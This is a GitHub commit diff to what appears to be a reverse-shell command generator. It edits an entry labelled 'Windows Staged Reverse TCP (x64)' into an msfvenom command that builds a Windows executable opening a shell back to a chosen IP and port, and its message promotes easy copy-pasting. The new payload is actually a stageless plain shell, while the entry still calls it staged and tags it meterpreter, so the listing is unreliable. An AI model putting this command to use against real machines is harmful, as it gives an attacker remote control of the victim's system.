Fixing "Windows Staged Reverse TCP (x64)"

Small typo for the command used to generate a Windows Staged Reverse TCP (x64). Modified the msfvenom payload to "windows/x64/shell_reverse_tcp" which should remediate this issue and allow for easier copypasta.
This commit is contained in:
parzival 2022-02-11 15:11:43 -07:00 committed by GitHub
parent 84f7b5dc41
commit ccda4bee19
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -350,7 +350,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "Windows Staged Reverse TCP (x64)",
"command": "msfvenom -p windows/x64/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
},
{